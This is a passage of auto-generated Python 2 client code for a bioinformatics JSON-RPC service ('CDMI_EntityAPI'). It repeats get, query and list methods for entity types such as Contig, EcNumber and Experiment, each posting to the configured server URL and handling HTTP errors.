raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_CompoundInstance(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_CompoundInstance',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ConservedDomainModel(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ConservedDomainModel',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ConservedDomainModel(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ConservedDomainModel',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ConservedDomainModel(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ConservedDomainModel',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Contig(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Contig',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Contig(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Contig',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Contig(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Contig',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ContigChunk(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ContigChunk',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ContigChunk(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ContigChunk',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ContigChunk(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ContigChunk',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ContigSequence(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ContigSequence',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ContigSequence(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ContigSequence',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ContigSequence(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ContigSequence',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_CoregulatedSet(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_CoregulatedSet',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_CoregulatedSet(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_CoregulatedSet',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_CoregulatedSet(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_CoregulatedSet',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Diagram(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Diagram',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Diagram(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Diagram',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Diagram(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Diagram',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_EcNumber(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_EcNumber',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_EcNumber(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_EcNumber',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_EcNumber(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_EcNumber',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Effector(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Effector',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Effector(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Effector',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Effector(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Effector',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Environment(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Environment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Environment(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Environment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Environment(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Environment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Experiment(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Experiment',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Experiment(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Experiment',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Experiment(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Experiment',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ExperimentMeta(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ExperimentMeta',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ExperimentMeta(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ExperimentMeta',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ExperimentMeta(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ExperimentMeta',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ExperimentalUnit(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ExperimentalUnit',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ExperimentalUnit(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ExperimentalUnit',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
